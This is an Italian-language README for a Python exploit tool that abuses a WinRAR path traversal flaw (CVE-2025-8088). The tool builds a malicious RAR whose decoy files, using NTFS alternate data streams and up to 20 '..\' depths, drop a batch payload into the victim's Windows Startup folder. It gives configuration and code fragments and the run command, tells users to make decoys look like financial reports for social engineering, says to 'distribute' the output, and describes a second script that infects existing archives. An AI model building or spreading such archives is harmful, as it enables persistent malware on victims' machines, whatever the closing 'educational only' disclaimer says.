
Sfrutta i sistemi che utilizzano versioni precedenti di WinRAR senza conoscerne il nome utente (a differenza di altri progetti)


Questo script Python sfrutta una vulnerabilità di path traversal (CVE-2025-8088) in WinRAR per distribuire payload nella cartella di avvio di Windows utilizzando più profondità di percorso relative. L'exploit crea un archivio RAR malevolo che, una volta estratto, scrive payload nella cartella di avvio della vittima a varie profondità di directory.
Lo script crea più file esca (20 di default), ognuno configurato per attraversare un numero diverso di directory padre:
NUM_DEPTHS = 20 # Number of different traversal depths
Ogni file utilizza una diversa profondità di percorso:
File1.txt → ..\Startup\payload.bat
File2.txt → ..\..\Startup\payload.bat
...
File20.txt → ..\..\..\ (20 times) \Startup\payload.bat
✅ Garantisce che, indipendentemente da dove la vittima estrae l'archivio (Desktop, Documenti, Download o cartelle annidate), almeno un payload raggiungerà la cartella di avvio.
I file esca contengono testo generico di default, ma dovrebbero essere personalizzati per un social engineering realistico:
# Create more convincing decoy content
decoy.write_text("Quarterly Financial Report Q3 2025.docx\n", encoding="utf-8")
Perché modificare il contenuto dei file esca?
Il payload è un semplice script batch di default, ma può essere sostituito con qualsiasi eseguibile:
PAYLOAD = "@echo off\necho Payload executed!\npause\n"
Posizione del payload:
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.bat
L'archivio RAR malevolo finale viene salvato come:
OUT_RAR = "exploit.rar"
La generazione di questo exploit richiede un ambiente Windows per diversi motivi:
Dipendenze da Alternate Data Streams (ADS)
Funzionalità esclusiva di NTFS utilizzata per allegare i payload:
ads_path = f"{decoy}:{placeholder}" # Windows-specific NTFS syntax
Requisito dell'eseguibile WinRAR
Utilizza la CLI Windows di WinRAR:
subprocess.run(f'"{rar_exe}" a -ep -os "{base_rar}" ...')
Compatibilità della struttura dei percorsi
Punta a percorsi specifici di Windows:
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu..."
Esecuzione del payload
Genera file batch di Windows:
@echo off
start /B notepad.exe
Personalizza la configurazione:
# Configuration
NUM_DEPTHS = 20
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B notepad.exe\n" # Your actual payload
DECOY_FILE_PREFIX = "Financial_Report_Q3_" # More convincing names
Esegui lo script:
python CVE-2025-8088.py
Distribuisci l'output:
exploit.rarQuesta versione del codice ti consente semplicemente di eseguire qualcosa come
python3 infect_premade_rarfiles.py website_backup.rar
Estrae tutti i file, inietta quelli che può, come .txt, .srt, .sql (non tutti i tipi di file funzionano), quindi crea il file rar pronto per l'esecuzione.
⚠️ Questo strumento è solo a scopo educativo e di ricerca sulla sicurezza.
Non usarlo mai contro sistemi senza esplicita autorizzazione. L'uso non autorizzato è illegale e non etico.